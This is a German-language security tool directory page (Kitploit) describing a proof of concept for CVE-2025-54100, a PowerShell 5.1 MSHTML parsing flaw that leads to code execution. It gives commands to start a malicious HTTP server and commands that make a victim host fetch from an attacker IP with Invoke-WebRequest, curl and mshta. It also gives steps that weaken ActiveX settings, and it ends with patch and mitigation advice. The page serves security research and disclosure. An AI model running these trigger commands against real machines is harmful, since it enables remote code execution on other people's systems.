Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-54100 — CVE-2025-54100 (Sicherheitslücke bei der Remotecodeausführung in PowerShell) | Kitploit
Tools/GitHubGitHub/xiaolvchen/cve-2025-54100
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungPayload-Entwicklung
GitHubxiaolvchen/cve-2025-54100

CVE-2025-54100

CVE-2025-54100 (Sicherheitslücke bei der Remotecodeausführung in PowerShell)

Repository anzeigen
1vor 7 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-54100 – PoC für das Parsen von PowerShell-Antworten

Demonstriert, wie CVE-2025-54100 durch bösartiges HTML-Parsing in Windows PowerShell 5.1 zu Remote Code Execution (RCE) führt.

Was ist CVE-2025-54100?

Schwachstellentyp: Befehlsinjizierungsrisiko, wenn Invoke-WebRequest ohne den Parameter -UseBasicParsing verwendet wird

Schweregrad: CVSS 7.8 (Hoch)

Grundursache: Die auf MSHTML basierende HTML-Antwortanalyse erlaubt die Skriptausführung (z. B. ActiveXObject) und führt diese im Kontext des Aufrufers aus

Betroffene Systeme:

  • Windows 10 / 11
  • Windows Server 2008–2025
  • PowerShell 5.1

So funktioniert der PoC

  1. Der FastAPI-Server in CVE-2025-54100.py liefert eine gezielt konstruierte HTML-Nutzlast zurück
  2. Das Skript im HTML versucht, ActiveX-Objekte wie WScript.Shell / Shell.Application zu instanziieren
  3. Auf einem verwundbaren Host führt der MSHTML-Parser das Skript aus, um durch das Starten von calc.exe Remote Code Execution zu demonstrieren
  4. Die bereitgestellte Nutzlast ist minimal und nicht destruktiv und dient ausschließlich Forschungs- und Validierungszwecken, kann aber bei Bedarf für weitere Analysen erweitert werden

Schnellstart

Voraussetzungen

  • Python 3.10+ (mit FastAPI und Uvicorn getestet)
  • Abhängigkeiten installieren
    root@kitploit:~
    python3 -m venv .venv
    source .venv/bin/activate
    pip3 install -r requirements.txt
    

Starten des bösartigen Servers

Starte den PoC-HTTP-Dienst:

root@kitploit:~
uvicorn app:app --host 0.0.0.0  --port 8888 --reload

Auslösen auf einem verwundbaren Host

Führen Sie auf einem verwundbaren Windows-Host ohne -UseBasicParsing die folgenden Befehle aus:

root@kitploit:~
# Invoke-WebRequest
Invoke-WebRequest -Uri "http://192.168.26.16:8888"
# curl(PowerShell 中的别名)
curl http://192.168.26.16:8888
# mshta
mshta http://192.168.26.16:8888

Stellen Sie sicher, dass der Port mit der Serverkonfiguration übereinstimmt. Wenn das System verwundbar ist, wird das eingebettete Skript durch den MSHTML-Parser ausgeführt.

Hinweis: Einige Antivirenprogramme blockieren dieses Verhalten möglicherweise, auch wenn die Parsing-Schwachstelle selbst weiterhin besteht.

Fehlerbehebung und Verifizierung

  1. Falls calc.exe nicht erscheint:
    1. Öffnen Sie auf dem Opfer-Host die Internetoptionen
    2. Gehen Sie zu Sicherheit → Stufe anpassen
    3. Aktivieren Sie „ActiveX-Steuerelemente, die nicht als sicher markiert sind, initialisieren und mit Skripten ausführen“
    4. Führen Sie Invoke-WebRequest erneut ohne -UseBasicParsing aus

Dieser Schritt dient der Verifizierung des Ausführungsvektors. In realen Angriffsszenarien können Angreifer Verschleierung oder Umgehungstechniken einsetzen, um die standardmäßigen Sicherheitsbeschränkungen zu umgehen.

Verifizierungsnachweis

PoC

Gegenmaßnahmen

Microsoft hat die Schwachstelle im Dezember 2025 behoben:

  1. Installieren Sie umgehend Windows-Sicherheitsupdates

  2. Verwenden Sie immer -UseBasicParsing, um das MSHTML-Parsing zu vermeiden:

    root@kitploit:~
    Invoke-WebRequest -Uri "http://<attacker-ip>:8888" -UseBasicParsing
    
  3. Wechseln Sie zu PowerShell 7+ (pwsh) – PowerShell Core ist für das Parsen nicht mehr auf MSHTML angewiesen und umgeht das Problem auf architektonischer Ebene.

Referenzen

  • NVD: CVE-2025-54100
  • MSRC: Update-Leitfaden
  • GitHub: osman1337-security/CVE-2025-54100
Tool herunterladen